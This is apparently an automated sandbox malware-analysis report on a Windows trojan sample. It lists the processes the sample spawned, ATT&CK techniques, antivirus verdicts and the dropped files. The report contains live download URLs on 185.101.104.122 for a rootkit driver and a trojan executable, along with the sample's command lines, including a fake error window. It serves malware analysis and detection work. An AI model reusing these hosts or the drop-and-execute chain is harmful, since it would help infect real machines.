Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5Jump to behavior
Source: C:\Windows\Vulnerability.exeCode function: GetLocaleInfoEx,FormatMessageA,4_2_00007FF7CC4238A8
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Vulnerability.exeCode function: 4_2_00007FF7CC424D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF7CC424D6C

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Windows Service		1
Exploitation for Privilege Escalation		131
Masquerading		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Credential API Hooking		12
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
LSASS Driver		2
Windows Service		12
Virtualization/Sandbox Evasion		11
Input Capture		531
Security Software Discovery		Remote Desktop Protocol11
Input Capture		11
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		11
Process Injection		11
Process Injection		Security Account Manager12
Virtualization/Sandbox Evasion		SMB/Windows Admin Shares11
Archive Collected Data		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism		1
Deobfuscate/Decode Files or Information		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture23
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
LSASS Driver		1
Abuse Elevation Control Mechanism		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
DLL Side-Loading		1
Obfuscated Files or Information		Cached Domain Credentials223
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541826 Sample: lUAc7lqa56.exe Startdate: 25/10/2024 Architecture: WINDOWS Score: 100 53 keyauth.win 2->53 61 Antivirus detection for dropped file 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 5 other signatures 2->67 9 lUAc7lqa56.exe 17 2->9         started        signatures3 process4 dnsIp5 55 185.101.104.122, 49730, 80 HOSTCLEAN-SRLRO Romania 9->55 57 keyauth.win 104.26.0.5, 443, 49737 CLOUDFLARENETUS United States 9->57 59 127.0.0.1 unknown unknown 9->59 45 C:\Windows\driverfo.sys, PE32+ 9->45 dropped 47 C:\Windows\Vulnerability.exe, PE32+ 9->47 dropped 49 C:\Users\user\AppData\...\driverfo[1].sys, PE32+ 9->49 dropped 51 C:\Users\user\...\Vulnerability[1].exe, PE32+ 9->51 dropped 77 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->77 79 Sample is not signed and drops a device driver 9->79 81 Tries to evade analysis by execution special instruction (VM detection) 9->81 83 4 other signatures 9->83 14 cmd.exe 1 9->14         started        17 cmd.exe 1 9->17         started        19 cmd.exe 1 9->19         started        21 3 other processes 9->21 file6 signatures7 process8 signatures9 85 Drops executables to the windows directory (C:\Windows) and starts them 14->85 23 Vulnerability.exe 2 18 14->23         started        27 certutil.exe 3 1 17->27         started        29 find.exe 1 17->29         started        31 find.exe 1 17->31         started        33 cmd.exe 1 19->33         started        process10 file11 43 C:\Users\user\AppData\Local\Temp\nULoYBmSWb, PE32+ 23->43 dropped 69 Antivirus detection for dropped file 23->69 71 Multi AV Scanner detection for dropped file 23->71 73 Accesses win32k, likely to find offsets for exploits 23->73 75 Machine Learning detection for dropped file 23->75 35 conhost.exe 23->35         started        37 WerFault.exe 2 27->37         started        39 conhost.exe 33->39         started        41 timeout.exe 1 33->41         started        signatures12 process13

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
lUAc7lqa56.exe38%ReversingLabsWin64.Trojan.Generic
lUAc7lqa56.exe29%VirustotalBrowse
lUAc7lqa56.exe100%AviraHEUR/AGEN.1315472
lUAc7lqa56.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys100%AviraRKIT/Agent.ykqds
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe100%AviraTR/Crypt.Agent.czxpy
C:\Windows\Vulnerability.exe100%AviraTR/Crypt.Agent.czxpy
C:\Windows\driverfo.sys100%AviraRKIT/Agent.ykqds
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe100%Joe Sandbox ML
C:\Windows\Vulnerability.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe55%ReversingLabsWin64.Trojan.Dacic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys33%ReversingLabs
C:\Users\user\AppData\Local\Temp\nULoYBmSWb3%ReversingLabs
C:\Windows\Vulnerability.exe55%ReversingLabsWin64.Trojan.Dacic
C:\Windows\driverfo.sys33%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
keyauth.win0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
keyauth.win
104.26.0.5
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.101.104.122/driverfo.sysfalse
    		unknown
    http://185.101.104.122/Vulnerability.exefalse
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://keyauth.win/api/1.2/4-100IlUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        http://185.101.104.122/Vulnerability.exeTlUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          http://185.101.104.122/driverfo.sys.6lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            http://185.101.104.122/driverfo.sysUUC:lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://185.101.104.122/VulneH)ClUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10BC000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://185.101.104.122/driverfo.sys$63lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://www.behance.net/madetypeFreelUAc7lqa56.exe, 00000000.00000002.1935015299.00007FF790082000.00000004.00000001.01000000.00000003.sdmpfalse
                    		unknown
                    http://185.101.104.122/driverfo.sysM6lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.101.104.122/hlUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://keyauth.win/api/1.2/fo.sysvlUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.101.104.122/driverfo.sysH6WlUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.101.104.122/driverfo.sysLMEMHhXlUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.101.104.122/DlUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.101.104.122/Vulnerability.exeJ)AlUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796890061.00000245E10B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://curl.haxx.se/docs/http-cookies.htmllUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://keyauth.win/api/1.2/http://185.101.104.122/Vulnerability.exeC:lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmpfalse
                                    		unknown
                                    http://185.101.104.122/Vulnerability.exeZZC:lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.101.104.122/driverfo.systlUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://185.101.104.122/Vulnerability.exeLMEMXxZlUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://185.101.104.122/driverfo.syst6ClUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://185.101.104.122/Vulnerability.exe&lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://185.101.104.122/driverfo.sysC:lUAc7lqa56.exe, 00000000.00000002.1934985033.00007FF79005B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                		unknown
                                                http://185.101.104.122/driverfo.sys.122/hlUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://keyauth.win/api/1.2/lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://185.101.104.122/driverfo.sysC6lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E108A000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1083000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      104.26.0.5
                                                      		keyauth.winUnited States
                                                      		13335CLOUDFLARENETUSfalse
                                                      185.101.104.122
                                                      		unknownRomania
                                                      		57673HOSTCLEAN-SRLROfalse

                                                      Private

                                                      IP
                                                      127.0.0.1

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1541826
                                                      Start date and time:2024-10-25 08:09:07 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 6s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:21
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:lUAc7lqa56.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:4c428e14cf5fc2c5e54ba377389c8253.exe
                                                      Detection:MAL
                                                      Classification:mal100.expl.evad.winEXE@27/9@1/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 25
                                                      • Number of non-executed functions: 70
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 204.79.197.219, 20.150.70.36, 20.150.79.68, 20.150.38.228
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, a-0016.a-msedge.net, blob.sat09prdstrz08a.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, blob.sat09prdstrz08a.store.core.windows.net, msdl-microsoft-com.a-0016.a-msedge.net, msdl.microsoft.akadns.net, ctldl.windowsupdate.com, vsblobprodscussu5shard10.blob.core.windows.net, msdl.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      104.26.0.5xVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                                        LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                          xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                                            4aOgNkVU5z.exeGet hashmaliciousUnknownBrowse
                                                              xVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                                                dGuXzI4UlT.exeGet hashmaliciousUnknownBrowse
                                                                  vjlICWbvGT.exeGet hashmaliciousUnknownBrowse
                                                                    SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                                                                      SecuriteInfo.com.Win64.MalwareX-gen.27133.15456.exeGet hashmaliciousUnknownBrowse
                                                                        SecuriteInfo.com.Win64.MalwareX-gen.7443.30781.exeGet hashmaliciousUnknownBrowse
                                                                          185.101.104.122SecuriteInfo.com.FileRepMalware.12632.12594.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122/driverfo.sys
                                                                          SecuriteInfo.com.FileRepMalware.8628.17723.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122/kernel.sys
                                                                          SecuriteInfo.com.Win64.MalwareX-gen.29573.28124.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122/kernel.sys
                                                                          Iyto7FYCJO.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122/driver.sys

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          keyauth.winxVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.1.5
                                                                          xxImTScxAq.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          4aOgNkVU5z.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          xVmySfWfcW.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          dGuXzI4UlT.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          vjlICWbvGT.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          SecuriteInfo.com.Win64.MalwareX-gen.7613.15918.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          SecuriteInfo.com.Win64.MalwareX-gen.31663.10814.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.72.57

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          CLOUDFLARENETUShttps://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                                                          • 104.18.90.62
                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                          • 104.18.91.123
                                                                          la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 104.22.149.180
                                                                          Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 188.114.97.3
                                                                          Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                          • 172.68.12.1
                                                                          EXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 172.67.155.139
                                                                          HOSTCLEAN-SRLROSecuriteInfo.com.FileRepMalware.12632.12594.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122
                                                                          SecuriteInfo.com.FileRepMalware.8628.17723.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122
                                                                          SecuriteInfo.com.Win64.MalwareX-gen.29573.28124.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122
                                                                          Iyto7FYCJO.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.122
                                                                          SecuriteInfo.com.W64.GenKryptik.GHEK.tr.28454.21428.exeGet hashmaliciousUnknownBrowse
                                                                          • 185.101.104.92

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ce5f3254611a8c095a3d821d44539877SecuriteInfo.com.FileRepMalware.12632.12594.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          SecuriteInfo.com.FileRepMalware.8628.17723.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          SecuriteInfo.com.Win64.MalwareX-gen.29573.28124.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          Iyto7FYCJO.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          SecuriteInfo.com.Win64.Evo-gen.20301.32747.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          SecuriteInfo.com.Win64.MalwareX-gen.32411.29244.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          Frozen_Slotted.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          SecuriteInfo.com.Win64.TrojanX-gen.12317.30120.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          fox vanguard bypass.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5
                                                                          FREE TEST.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.0.5

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\AppData\Local\Temp\nULoYBmSWbPPLKiller.exeGet hashmaliciousUnknownBrowse
                                                                            xd.exeGet hashmaliciousUnknownBrowse
                                                                              xd.exeGet hashmaliciousUnknownBrowse
                                                                                xd.exeGet hashmaliciousUnknownBrowse
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exeSecuriteInfo.com.FileRepMalware.12632.12594.exeGet hashmaliciousUnknownBrowse
                                                                                    Iyto7FYCJO.exeGet hashmaliciousUnknownBrowse
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sysSecuriteInfo.com.FileRepMalware.12632.12594.exeGet hashmaliciousUnknownBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\lUAc7lqa56.exe
                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):145408
                                                                                        Entropy (8bit):6.159203978020291
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:nvJpbB++pE3j0XJwH464mIWeBq/y9Dqp2k:xpbBhpE3jQwY6BP/Kkx
                                                                                        MD5:8619AFEC8BD66B2C589FC987D7D0B194
                                                                                        SHA1:095C0CC0F2B79CB1D8B8D6CFD453ACA3111C5DC6
                                                                                        SHA-256:4423F74778917B5BDA37B9DB045291CC980D99376E4818AF113FEE4F8D92EFD3
                                                                                        SHA-512:424E0067360DFC6845F3D028BCDC80F0AAFA843752C084BBA192BEAD6AD705356F3D78507E5A21F4C67FB61CE6F4834EEF113363B6C62E507CCAC86DBC8C61BB
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: SecuriteInfo.com.FileRepMalware.12632.12594.exe, Detection: malicious, Browse
                                                                                        • Filename: Iyto7FYCJO.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..89..k9..k9..k0..k/..k?..j3..k?..j=..k?..j...k?..j?..kr..j(..k9..k1..kV..j>..kV.ck8..kV..j8..kRich9..k........PE..d...>..f.........."....&.N...........H.........@.............................p............`..........................................................P.......@..0............`..........p.......................(...p...@............`...............................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data........0......................@....pdata..0....@.......$..............@..@.rsrc........P.......4..............@..@.reloc.......`.......6..............@..B................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\AB6E94A2098C7E1ADF1A0B7B18448F0D6B5F55AA62BB62760C12A51161058F4B00[1].blob

                                                                                        Download File
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:MSVC program database ver 7.00, 1024*915 bytes
                                                                                        Category:dropped
                                                                                        Size (bytes):936960
                                                                                        Entropy (8bit):5.437833471017948
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:SQmdQgYdje3k8tHhphHqBtNoJEGqpoG6C2O4zT8XwujLUu9YAjNk5Jrg:WzTlblqDpkCtST81Sh
                                                                                        MD5:C253723686BE0E215A3CE10D77B3BF02
                                                                                        SHA1:FD4B82FC23BED476A4264A28F5CFA86734CAB337
                                                                                        SHA-256:4EF01E1F382BCB1466ECDA5266BD36A57C1B74850C8F7A771CF54F604E4EC921
                                                                                        SHA-512:D6353B07D59F5C3239B454A74CBE7D88B59EACAF6062E5F880F079AC10FEE27CED81ED7C5E9C4751FF1E5DC69E6F0C811B9C5735500F517FD7038D5626BDD464
                                                                                        Malicious:false
                                                                                        Preview:Microsoft C/C++ MSF 7.00...DS...............8...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\lUAc7lqa56.exe
                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):19712
                                                                                        Entropy (8bit):6.43600081360648
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:OGTpcx5nF14z5KreVeNyno8E9VFzSJIVGzJnIZ:O5nFYz/EsG
                                                                                        MD5:4A4A6A5F82ECB5F56F3C4C919E5B74C2
                                                                                        SHA1:04F1E57E0333F49F65DBE5E0BC98DD667F819435
                                                                                        SHA-256:27DFFDB37542AED81486B8E58762B36FC5AB4E48B76BA0AF670D13D7D78498D5
                                                                                        SHA-512:6B47DBDD1702ABCF65E147A31B181F2DF6BCDEA7D332DDD8C8113D2022382323CE44C4706A58D4C9DC1D211F588F880968CB4364134AE4CC9C8D430AA01504C5
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: SecuriteInfo.com.FileRepMalware.12632.12594.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A..U ..U ..U ..U ..T ...X..V ..U ..N ...X..S ...X..P ..:...T ..:...T ..RichU ..................PE..d......g.........."....&.......................@....................................c^....`A.................................................`..(............P.......*...#...p..$...`2..8........................... 1..@............0...............................text............................... ..h.rdata..P....0......................@..H.data........@....... ..............@....pdata.......P......."..............@..HINIT.........`.......$.............. ..b.reloc..$....p.......(..............@..B................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\nULoYBmSWb

                                                                                        Download File
                                                                                        Process:C:\Windows\Vulnerability.exe
                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):14024
                                                                                        Entropy (8bit):6.424652104000671
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:PXieNdtikfKSLPMsDvUDkGtVkUTgBxe1HCjT+pdhh2nhpml0idEC8jSJUbueqeul:PXiQKSLPMo0IKP72hpm5dECdUb+eul
                                                                                        MD5:2D8E4F38B36C334D0A32A7324832501D
                                                                                        SHA1:F6F11AD2CD2B0CF95ED42324876BEE1D83E01775
                                                                                        SHA-256:01AA278B07B58DC46C84BD0B1B5C8E9EE4E62EA0BF7A695862444AF32E87F1FD
                                                                                        SHA-512:B0329590D2402DDB6DC98553BE3CDC48E0E70CD9797A44B6448B97CA31754B999BEEEBF593225A6254FDDDAA9453920431DD8EAE894732B6E6438E5B2D8A72FD
                                                                                        Malicious:true
                                                                                        Antivirus:
